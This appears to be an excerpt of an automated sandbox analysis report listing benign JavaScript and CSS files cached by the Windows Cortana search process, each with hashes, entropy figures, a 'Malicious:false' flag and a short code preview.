                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):55911
                                                                            Entropy (8bit):5.115344580288744
                                                                            Encrypted:false
                                                                            SSDEEP:768:gduBggnd/KAcLY7E++ZcHZUQ5j/p0AL/uTYMHJo1TeOUXhW+G9QgzyHc:gzZKZhMyT+XnG9Pzy8
                                                                            MD5:F9F991415FEEC8D1A36A3EDFFD46E3A4
                                                                            SHA1:53135BD81A926596F546DD418F1E19499B688603
                                                                            SHA-256:02186AF7EBDA2799AF5B71E92758483522E54D6D023735B80C0EEB1415DCA09C
                                                                            SHA-512:082C5043F156B7E7A5E634DA1AEC057FAD0F89ECD83E1918B20CA371FF4961C3095A7A3667EEBAF6C4D2FA5887F9D37D5E8DC7A3C6C29FE8E1057535EEA38D57
                                                                            Malicious:false
                                                                            Preview: var __assign,__extends,__spreadArrays,WSB;(function(n){var t;(function(n){function t(){for(var t,r,u,n,f,e=[],i=0;i<arguments.length;i++)e[i]=arguments[i];for(t=[],r=0,u=e;r<u.length;r++)if(n=u[r],n)if(typeof n=="string")t.push(n);else for(f in n)n[f]&&t.push(f);return t.length>0?t.join(" "):null}function i(n){return ThresholdUtilities.getUrlParameter(location.search,"isTest")?n:undefined}n.ViewData={};n.classNames=t;n.whenTestHooks=i})(t=n.View||(n.View={}))})(WSB||(WSB={}));__extends=this&&this.__extends||function(){var n=function(t,i){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(n,t){n.__proto__=t}||function(n,t){for(var i in t)t.hasOwnProperty(i)&&(n[i]=t[i])},n(t,i)};return function(t,i){function r(){this.constructor=t}n(t,i);t.prototype=i===null?Object.create(i):(r.prototype=i.prototype,new r)}}(),function(n){var t;(function(n){var t=function(n){function t(){return n!==null&&n.apply(this,arguments)||this}return __extends(t,n),t.prototype.componentDidMo
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\BLQZTUOA\x9YbPXmr_162ZB7uPO0Z384g334[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1762026
                                                                            Entropy (8bit):6.274276642853282
                                                                            Encrypted:false
                                                                            SSDEEP:24576:CwPD26QWjvUe7uDD0DDXp7lv5ib6uxsvgwDgiZO:CmDHQWjvUe7uDDADFlv5ssgwDgi0
                                                                            MD5:6C78E4B767C0BB763B5947B27B171ADF
                                                                            SHA1:94F4CBB7C9C438DBB5A0F95510E9EEC5990CE19C
                                                                            SHA-256:865DBF4B0B0C65B06FE7D1F7194DD0F5A404BF505089069A2C51EC00634643AE
                                                                            SHA-512:7C990856C3E8F8E6E833780D978BBFD2773C75A2D5736A341754F22DB84C01A22F0CA6A9C66BA307D2AD3979A0A95ADDE18C038E93ED2125CAF4D989594B344C
                                                                            Malicious:false
                                                                            Preview: (function(n,t){function i(n,t){return LocStringManager.register({uiCulture:n,name:"WsbLocStrings",namespace:"WindowsSearchBox"},{AadAccount:t[0],AcceptButtonOK:t[1],AcknowledgeFlyoutText:t[2],ActionsSection:t[3],AddAadAccount:t[4],AddingScopeNarratorText:t[5],AddingScopeNarratorTextAll2:t[6],AddMicrosoftAccount:t[7],Album:t[8],App:t[9],Artist:t[10],Author:t[11],AvailableAccounts:t[12],BestMatch:t[13],BestMatchFor:t[14],BingImageAPIError:t[15],BingImageLeftCarousel:t[16],BingImageOfDay:t[17],BingImageRightCarousel:t[18],Build:t[19],Cancel:t[20],Clear:t[21],CloudSearch:t[22],CommandGroup:t[23],Company:t[24],ConnectedAccount:t[25],ConnectedAccounts:t[26],ContactGroup:t[27],Content:t[28],ContextMenu:t[29],ControlPanelAnnotation:t[30],CopyDetails:t[31],CopyFullPath:t[32],CortanaAnnotation_Email:t[33],CortanaGroup:t[34],CustomizeSearchHome:t[35],DesktopAppAnnotation:t[36],DirectNavSuggestion:t[37],DismissBingImage:t[38],DismissFlyout:t[39],DismissUpsell:t[40],EdgeUpsellButtonMessage:t[41],Ed
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\BLQZTUOA\zEQqhwKoETyGdQapOnP2uL1FFF0.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):202174
                                                                            Entropy (8bit):4.353086485551748
                                                                            Encrypted:false
                                                                            SSDEEP:1536:nHHWGK3LUfMkjT35OqPrmqsoHh/yKdei6sBpxrjkwT6qt1SgtzjrsisQ1JLgRHX:2V
                                                                            MD5:30F68A3EA9F8FE63101E59CED32FA3E7
                                                                            SHA1:0450964533A5363F20FD7A7AE16821CDFC1FCC1D
                                                                            SHA-256:90FCCF6342D5BCFDE3F69F88B80253EC694B9B901CC55FD84A2E0C6E0FF05CAF
                                                                            SHA-512:F994377757539611FE2781B6AEEDCFE2B2C7073516C0F3887C0FD836E1ED69066DAABE7065DAE1FC4AA071F8F5080939591B3EBD4642B1EAA42C7B25C2003349
                                                                            Malicious:false
                                                                            Preview: var WSB;(function(n){var t;(function(n){var t;(function(n){function t(n,t){return n[t]?n[t]:0}function i(n){return t(n,282)>.3896?t(n,282)>.38961?t(n,267)>.6104?t(n,39)>.0145?t(n,282)>.66669?t(n,38)>7124751?t(n,103)>.99997?.49246:.46311:.42968:.2235:t(n,3)>.03371?.4983:t(n,282)>.62505?t(n,25)>.503?t(n,47)>2.5?.44633:.30993:t(n,38)>223508416?.47784:t(n,269)>4502?t(n,269)>4565?.47772:t(n,284)>1.5?t(n,103)>.99997?.49992:.4902:.4969:.45473:.15382:t(n,267)>.61031?-.49998:.23231:.48906:t(n,0)>.50822?t(n,266)>.00112?-.29242:t(n,41)>.9715?.42523:t(n,41)>.3765?t(n,421)>.71793?t(n,38)>67927560?.44213:.43113:.3727:t(n,24)>.1855?-.031:.35364:t(n,103)>.98373?t(n,421)>.69234?t(n,266)>.00112?-.08047:.41851:t(n,94)>.7673?.4414:t(n,38)>5528556?t(n,94)>.17559?t(n,40)>.1685?.19613:-.26247:-.28885:.21078:t(n,266)>.24569?t(n,1)>.5?t(n,0)>.00477?t(n,266)>.25463?-.43181:t(n,264)>.53942?-.49933:-.27443:t(n,264)>.53942?t(n,266)>.25463?-.46023:-.49705:-.45348:t(n,38)>694628928?t(n,41)>.2425?t(n,267)>.6104?-.441
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\IZZ4D0Z1\98-tFzBbrLP3oaKdmZtyZ4BBBI4.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:UTF-8 Unicode text, with very long lines
                                                                            Category:dropped
                                                                            Size (bytes):121609
                                                                            Entropy (8bit):5.370285863147917
                                                                            Encrypted:false
                                                                            SSDEEP:3072:wKXX4GkTzrQcDhJYoGWvDRBaLr9FpKFV8fUkFUkZ86E:wKuLvEFSiz8j
                                                                            MD5:129776DB6BA6BEA4AF70CDB1EA56942A
                                                                            SHA1:12BFE666C0B57B134E7B8B88BCF1A0C3B5DCF3CD
                                                                            SHA-256:2D55886903198E35295B8E90738DA47859837BABA26D47E15BAC87F90EE608D3
                                                                            SHA-512:AEDF99A152B97BE6A57F0D1FB1DD43B0BB69508EAE65B3A054024CD9E5DD59670EBEAFF6CE7525E2B7263BBD7C963C30659628F9A2DF16410674871538DEF94B
                                                                            Malicious:false
                                                                            Preview: /*! Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. */.var WinJS_Init=function(n,t){var i=typeof n!="undefined"?n:typeof t!="undefined"?t:typeof global!="undefined"?global:{};(function(n){typeof define=="function"&&define.amd?define([],n):(i.msWriteProfilerMark&&msWriteProfilerMark("WinJS.4.4 4.4.0.winjs.2016.5.19 base.js,StartTM"),typeof exports=="object"&&typeof exports.nodeName!="string"?n():n(i.WinJS),i.msWriteProfilerMark&&msWriteProfilerMark("WinJS.4.4 4.4.0.winjs.2016.5.19 base.js,StopTM"))})(function(){var u,r;return function(){"use strict";function t(n,t){n=n||"";var i=n.split("/");return i.pop(),t.map(function(n){if(n[0]==="."){var r=n.split("/"),t=i.slice(0);return r.forEach(function(n){n===".."?t.pop():n!=="."&&t.push(n)}),t.join("/")}return n})}function f(r,f,e){return r.map(function(r){if(r==="exports")return e;if(r==="require")return function(n,i){u(t(f,n),i)};var o=n[r];if(!o)throw new Error("Undefined dependency: "+r);return o
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\IZZ4D0Z1\BCoT3iZA2miR3X-hd4kw6B9y1DI.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):44728
                                                                            Entropy (8bit):5.5805883446878966
                                                                            Encrypted:false
                                                                            SSDEEP:768:eaCiT8vK9dy5/UFrI09P65DeyYJHquTLJlvlLtaupJ:APK9A5/UFrlRiDeyYJLLt3
                                                                            MD5:050EA448D5EBC56137F8530780ED7281
                                                                            SHA1:320C83310C58A928A5D4B838754F706655EAC373
                                                                            SHA-256:6CDEE6BF3359EFD459B9EAADD89DE46924D4A2F4794D30E43AE31A543B1E3479
                                                                            SHA-512:B7627B56E6D200FD0532165EF537C0CAA48AFB30F7B98E0F4D8A003FB497939D61251D3C9F0356424C44FA8D34725C20689691D1673F60ECE2317692D5E0C0EF
                                                                            Malicious:false
                                                                            Preview: var WSB;(function(n){function h(n){return n.toLocaleLowerCase().replace(l,"").trim()}function e(n,t,i,r,u){if(!n)return i;if(typeof n!="string")try{return{content:URL.createObjectURL(n),type:0,bgColor:r}}catch(f){return SharedLogHelper.LogError("convertToHtmlImage "+t,u,f),i}else return{content:n,type:0,bgColor:r}}var c="data:img/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAYAAACqaXHeAAAR4UlEQVR4nMVbe4wd5XX/nW/m7nr9XNtpMSqpAZOShLbQ8gpgIFHU/EOSmiJASaWqqqmCUpqakMoxCKEopXbVQoiEqigyJFFaEVInMcSkokqa3YQIh9CAIAZMvH6AIfiBd+193cfMd6pzvsfM3Hv3Za/Jt5qd973f+Z1zfucxc4mZcTrHRT95cwPA6xj2fMAuY7J9gHynLBagYk1kZTsjsmMEux/A/sRk33r28ksfPV1TnHcALh58ezXD3s2w1zHsqiAge6EZeUloiwiG3xYQyK/lmJF9skzIDyVJ9gSR/eLTf3rtgfma77wBcMng8Q2AvY1h17AKbMFRQL8vwuu3OkAoAFECQPaJisUBINfmMCaHoQzG2CFD+YM/vfDPHjjVeZ8yAJcOnhATv4fB/U7DNi6iaV0jrxwL11UFd0IShe1i3+jaIk1aCgApEBbGZJOGsi//7wV/vukdB+CywfHVAP9INO4ECkI5TTMhah5toBTHg/kHSwjaLtZyPjEOAGNaCoazhNwBYjLZHjEm/8KT5980Z4s4KQAuH5zYDPBGVjHZ+7fVvwCA0z6XTF9cojD5CgDeEqjMAwUpismrxhMBwAufmKazDiPbm
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\IZZ4D0Z1\Cj4mQnDN_eMyYEqsEbjRrJ2Ttec.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview: 1
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\IZZ4D0Z1\W2hOpEntGkVdY-X4J7A-7qVIVkM.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):61296
                                                                            Entropy (8bit):5.2106846676753555
                                                                            Encrypted:false
                                                                            SSDEEP:1536:JLKXX6+Bm3gjQtskZDWrTz1qscdLkIeW9Ac2HVNe0UkFZsxXn5WGJChIx1D4n8f:9KXqnkKmc2wh5WGJChqf
                                                                            MD5:9DE07063B8DAD6F4C5B80419A42872A1
                                                                            SHA1:BA4BE19DA749A38F7C1913420DD12B9435071CDB
                                                                            SHA-256:ABA985808F2FEA1ECE67DC6BC0733EB53A45AFF413F60AE13A038B9ABC7ECF8A
                                                                            SHA-512:CDBF84DDC1E0BACDBEEC788DBABE1433C4E58A453AD3A7566899CEADFF6D0D7EEC72D5CD86B8A68B0C2E029DD2BE3F3FC65573A535D05A4093C2C6609FE911C8
                                                                            Malicious:false
                                                                            Preview: var WSB;(function(n){function bi(n,i){var r=[],u,f;if(i)if(n)r=i.slice();else{u=function(n){var t=i.find(function(t){return t.verb&&t.verb.toLocaleLowerCase()==n.toLocaleLowerCase()});t&&r.push(t)};for(f in t)u(f)}return r}function ki(n){return n?n.filter(function(n){return!n.verb||n.verb.toLowerCase()!="open"}):[]}function f(t,i,r,u,f,e){e()&&(t=t.slice(),i.getExtraVerbsAsync?n.Promise.safeChain("getExtraVerbsAsync",function(){return i.getExtraVerbsAsync(u)},function(n){return h(k(t,n,!0),i,u,f,e)},function(){return h(t,i,u,f,e)},null,r):h(t,i,u,f,e))}function h(n,t,i,r,u){if(u()){var f=t.getExtraVerbs?k(n,t.getExtraVerbs(i),!1):n;f[0]==v&&f.shift();r(f)}}function di(i,r,u,f){return i.map(function(i){var e,o,s,h;if(i.verb){switch(i.verb.toLocaleLowerCase()){case at:e="PinnedToStart";break;case w:e="PinnedToTaskbar";break;case vt:e="UnpinnedFromStart";break;case b:e="UnpinnedFromTaskbar";break;case lt:o="UninstallConfirmation";e="UninstallationInProgress"}return s=function(t){t();n.Run
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\IZZ4D0Z1\jhP1uapRf8Z8Qb959t11DNTsvB8.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):94820
                                                                            Entropy (8bit):5.395085534401416
                                                                            Encrypted:false
                                                                            SSDEEP:1536:pSiK8U0NfNWx/mrV+vR1f1fyaSDUQsdObzFcFFUHZy:FV+rf1DQdRcDqy
                                                                            MD5:95029A2B8ED04C57F44599682E9CE9C6
                                                                            SHA1:1E4A4BBEC5E408C925BB30FEFA2F7F1E5F6FEBBA
                                                                            SHA-256:15EDF8C630F285A9B9D9033D867F4FB1D5288AD3BE707F31FB3BF7EDFA54EAEA
                                                                            SHA-512:3C1F3EAA0E2D26D8CF854714E4BA4AF36B102D7AA8CE4138734406BABCD54DC3002EE31A3540009EA7E2C8C8DC3C8CB2CE6E753F410E6C3A0EF055A1E362A608
                                                                            Malicious:false
                                                                            Preview: /** @license React v16.1.1.. * react-dom.production.min.js.. *.. * Copyright (c) 2013-present, Facebook, Inc... *.. * This source code is licensed under the MIT license found in the.. * LICENSE file in the root directory of this source tree... */../*.. Modernizr 3.0.0pre (Custom Build) | MIT..*/..'use strict';(function(ea,l){"object"===typeof exports&&"undefined"!==typeof module?module.exports=l(require("react")):"function"===typeof define&&define.amd?define(["react"],l):ea.ReactDOM=l(ea.React)})(this,function(ea){function l(a){for(var b=arguments.length-1,c="Minified React error #"+a+"; visit http://facebook.github.io/react/docs/error-decoder.html?invariant\x3d"+a,d=0;d<b;d++)c+="\x26args[]\x3d"+encodeURIComponent(arguments[d+1]);b=Error(c+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings.");..b.name="Invariant Violation";b.framesToPop=1;throw b;}function oa(a,b){return(a&b)===b}function Qc(a,b){if(Rc.hasOwnProperty(a)||2<a.
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\IZZ4D0Z1\p_H40Ndq102p2Socno0_V88cqhw[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):8313
                                                                            Entropy (8bit):6.052018977754187
                                                                            Encrypted:false
                                                                            SSDEEP:192:9Acfyf9Kn8i/kzSRS7cb8xM/Qbs3CyzSz/Wp:Wcfyf9K8i/kzSRycbdQbsWLWp
                                                                            MD5:ABF5B9B940857FBD14B60DEA87CCB55F
                                                                            SHA1:8A8AA1FF59E26E1C9E5137269630CA25DA231F3E
                                                                            SHA-256:402598AD8D9469816D4AA4E7DF4957B8A01AC03BF09A9AFED279E45777B046C8
                                                                            SHA-512:F3B556775EF65D0836E3B593867DA0194F0D2E67F78CFEFF99218851466A7F7E6364369194735FFDC22021175A8959B05F71F959D968897812DDB1EAB5FACE0A
                                                                            Malicious:false
                                                                            Preview: (function(n,t){function i(n,t){return LocStringManager.register({uiCulture:n,name:"MicrosoftSearch",namespace:"WindowsSearchBox"},{MsbPeopleContacts:t[0],MsbPeopleGroups:t[1],MsbReverifyAccount:t[2],MsbVerifyAccount:t[3]}),i}return i(n,t)})("ar",[".... .......",".........",".... .. ..... ..... .. ....... ..... .. {0}",".... .. ..... ..... .. ....... ....."])("bg",["........",".....",".......... ....... .., .. .. ....... .......... .. ........ .. .. {0}",".......... ....... .. .. ....... . ......... .........."])("ca",["Contactes","Grups","Verifiqueu el compte per cercar informaci. de la feina des de {0}","Verifiqueu el compte per cercar informaci. de la feina"])("cs",["Kontakty","Skupiny","Chcete-li vyhledat pracovn. informace z adresy {0}, ov..te sv.j ..et","Chcete-li vyhledat pracov
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\IZZ4D0Z1\tVGM8TyKXWdpDHuIvJZ45J_RvyM.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65035
                                                                            Entropy (8bit):5.41756307211032
                                                                            Encrypted:false
                                                                            SSDEEP:1536:bpJDABkWmvRKLVGlnk+6hvbnKuw5nG0ph+pjr7iIBI3vJGsj0wJZ:bTDAp6611I0q
                                                                            MD5:B1409256D12728940F594BE1DFE4C8E8
                                                                            SHA1:19E30D2938F9A53F4C30A7141C3E9B5BD9AD37DC
                                                                            SHA-256:CD6D3F0A75ADD15D6698F973B8B17DD4BABA4D320DB94C4F9E566DBA399D4C8B
                                                                            SHA-512:D739A0794233BDCF857FF8C5118A0968343DAF94A5FDBEBFF22AC39F34B044C7B2562689CF10677A9921CDF8C9EFAFD11CDB17F65C473FB6A25888F0C1F97409
                                                                            Malicious:false
                                                                            Preview: var __extends=this&&this.__extends||function(){var n=function(t,i){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(n,t){n.__proto__=t}||function(n,t){for(var i in t)t.hasOwnProperty(i)&&(n[i]=t[i])},n(t,i)};return function(t,i){function r(){this.constructor=t}n(t,i);t.prototype=i===null?Object.create(i):(r.prototype=i.prototype,new r)}}(),__spreadArrays,WSB;(function(n){var i="NT",p="NF",t="https://substrate.office.com{0}/api/v1/",w=t+"events",o=t+"init",b=t+"suggestions?query=",k=t+"query",d=t+"recommendations",s="SubstrateSearchService",g="https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/{0}?Protocol={1}",r="AutoDiscoveryKey",h="gwsflt.",nt="textdecorations",c="scenario",tt="setflight",it="debug",l="entitytypes",rt="1",ut="scopes",ft="people.directorysearch",et="Authorization",f="Content-Type",ot="X-AnchorMailbox",st="X-Client-Language",ht="X-Client-LocalTime",a="Client-Request-Id",v="User-Agent",ct="X-Debug-ExternalExp",lt="X-Client-Flights"
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\IZZ4D0Z1\tq3wytne-N9U8sOc3W2KXA4Dmtw.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:exported SGML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):205495
                                                                            Entropy (8bit):5.318795383032699
                                                                            Encrypted:false
                                                                            SSDEEP:3072:4EB29xxDxpFEnPluRupigfdhl6qLayhQ/Dsl3JrMdsxYBDIBkb:7B29x9+vfdGGJrMdCYBDIBkb
                                                                            MD5:63F41317FD3165A980E317BF7DC40D96
                                                                            SHA1:AF4BBB3D1ECB50715F76E3D8E4FB26C1A234A6F5
                                                                            SHA-256:C563126353575F85D1E7A447C3FD3957179B0D6DBB2A06B758906A042881172B
                                                                            SHA-512:9775B3AE474A3D10B5B2D9DF4EBFDEB7CAEB59852AA707349AE6B49E8041A9C90497CA6A29E011B5E64977E481515F51A468C8CF7B4282F6A5D801941CF1A1B6
                                                                            Malicious:false
                                                                            Preview: var __extends=this&&this.__extends||function(){var n=function(t,i){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(n,t){n.__proto__=t}||function(n,t){for(var i in t)t.hasOwnProperty(i)&&(n[i]=t[i])},n(t,i)};return function(t,i){function r(){this.constructor=t}n(t,i);t.prototype=i===null?Object.create(i):(r.prototype=i.prototype,new r)}}(),__spreadArrays,WSB;(function(n){function f(t,r,u,f,e,o,s,h){i(t,r,u,function(t){var i=null;t.status==200&&(i=t.responseText?n.safeExecute(function(){return JSON.parse(t.responseText)},"JSON.parse"):{success:!0});f(i)},e,o,s,h)}function i(i,r,u,f,e,o,s,h,c){var l=c&&_w.XMLHttpRequest?new XMLHttpRequest:sj_gx(),v,a;try{l.open(u?"POST":"GET",i,!0)}catch(y){SharedLogHelper.LogError("fetchUrl",i,y);f&&f({responseText:"",contentType:"",status:-1,result:3});return}if(r)for(v in r)l.setRequestHeader(v,r[v]);e&&(a=e.register(function(){return l.abort()},!1,"xhr abort"));n.config.useEventListeners?(l.addEventListener("load",function(){t
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\LSXA5TU8\-DaYvsNPmANQqNt2gIDIqo1iPTw[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:UTF-8 Unicode text, with very long lines
                                                                            Category:dropped
                                                                            Size (bytes):52948
                                                                            Entropy (8bit):5.524952238551884
                                                                            Encrypted:false
                                                                            SSDEEP:1536:CeAy8XLTUO88FCSO6wlci0ibiIiHiU/cppI+TS:CrLT3CSO2i0ibiIiHiowTS
                                                                            MD5:A94E1BBCFD4435B38F36AC15A4376359
                                                                            SHA1:7B30C014B2A57DF5F8397D33F73C7BDF9924C7AD
                                                                            SHA-256:A621699D8842C74177D34E0EA77A477EE82B3FAAD2F52E18CCA9364106E8AF63
                                                                            SHA-512:FA420A51069886EA0113B6E0695FDFCC8B0CEFBEED30C1E646BD91C5C5CD24E8CEDAD649F35F9ECB39B72779370255447F6E38E0F96B3DE91EC9E1A2B4D96EDE
                                                                            Malicious:false
                                                                            Preview: var __spreadArrays,CoreUtilities,LoggerModule,VisibilityChangeHelperModule,HitHighlightingParserImpl,DataSourceLayoutManager,ThresholdDiagnosticsProd,FailedPromise,ThresholdUtilitiesM2;_w.EventsToDuplicate=[];_w.useSharedLocalStorage=!1;define("shared",["require","exports"],function(n,t){function s(n,t){for(var r=n.length,i=0;i<r;i++)t(n[i])}function r(n){for(var i=[],t=1;t<arguments.length;t++)i[t-1]=arguments[t];return function(){n.apply(null,i)}}function u(n){i&&event&&(event.returnValue=!1);n&&typeof n.preventDefault=="function"&&n.preventDefault()}function f(n){i&&event&&(event.cancelBubble=!0);n&&typeof n.stopPropagation=="function"&&n.stopPropagation()}function e(n,t,i){for(var r=0;n&&n.offsetParent&&n!=(i||document.body);)r+=n["offset"+t],n=n.offsetParent;return r}function o(){return(new Date).getTime()}function h(n){return i?event:n}function c(n){return i?event?event.srcElement:null:n.target}function l(n){return i?event?event.fromElement:null:n.relatedTarget}function a(n){retu
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\LSXA5TU8\BBDBvk5AokRBwrox4FNOb3dTd1E[1].css
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):7671
                                                                            Entropy (8bit):5.15245035345059
                                                                            Encrypted:false
                                                                            SSDEEP:192:UADGOuMWZEWjhd7FeyLCL6p7tkJ/srOk3aG3ek1EWTnl/kv9:UuJGcMJfLO
                                                                            MD5:A1F32F25C7C924B918EA54A86670D731
                                                                            SHA1:F1BF7CB5ADDF0C4BCED58D661137A1F0ACD257C5
                                                                            SHA-256:6B58339F9240E372FA046E985DA0D0C5A17B679F27FF3058D6EBD4CD515CA874
                                                                            SHA-512:5ACEFCAB3062051BD538CCF57EBCBB0BC9FCF11C12768EC7559B2ADA84F871299CE2C93B2400807F362578AD2C0F31AFF5CFE925C2FB259A7FFD24CC498435ED
                                                                            Malicious:false
                                                                            Preview: body #fbpgdg{color:#000;font-family:'Segoe UI',Arial,Helvetica,Sans-Serif;font-style:normal;font-variant:normal;font-weight:normal;background-position:inherit;display:initial;cursor:pointer;line-height:15px}body{position:static}body[dir]{margin:0}#fbpgdg,#fbpgdg *{box-sizing:content-box}#fbpgdg h2{font-weight:bold;-webkit-margin-before:.83em;-webkit-margin-after:.83em;font-size:1.3em;line-height:15px}body[dir] #fbpgdg h2{margin:10px 0 10px 0}#fbpgdg h3{font-weight:bold;font-size:1.17em;display:block}#fbpgdg .fb-t-small{font-size:13px}#fbpgdg .fbctgcntsdk,#fbpgdg .container{-webkit-margin-after:0}body[dir] #fbpgdg .fbctgcntsdk,body[dir] #fbpgdg .container{margin-bottom:0;margin-top:10px}body[dir='ltr'] #fbpgdg .fbctgcntsdk,body[dir='ltr'] #fbpgdg .container{padding-left:0}body[dir='rtl'] #fbpgdg .fbctgcntsdk,body[dir='rtl'] #fbpgdg .container{padding-right:0}#fbpgdg .fbctgctlsdk{list-style:none;display:list-item}body[dir] #fbpgdg .fbctgctlsdk{margin:10px 0 10px 0}#fbpgdg a{text-decorati
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\LSXA5TU8\CZIHQonDpTUFJtspRwNCgsVwcbI[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines
                                                                            Category:dropped
                                                                            Size (bytes):20331
                                                                            Entropy (8bit):5.353707554144033
                                                                            Encrypted:false
                                                                            SSDEEP:384:KrKmz6fqbGpAbQJegXlAqW2oJWZ3BnqIfPZGmVY4OtKAvKXAL5NuwK3++9O:dweJlA8pBnqIHbYPt4XALulO
                                                                            MD5:8F26207241C02CE723D12F116BD4FC94
                                                                            SHA1:4B0B6224194AC8FF83AFBE01F43F961C6AB381B2
                                                                            SHA-256:70BB56FFDBA78F49FB3C5112E4A10F87305AA84AA30C16A2DB89D09C8DC1DE6B
                                                                            SHA-512:53B57930C395B741D1D6E10E27333480928AA11CB6386805922B0410A187424A109F7F1111D6C539C9FCCC1FB4F618A3F9BBB886D5B2808F856C429B6099800A
                                                                            Malicious:false
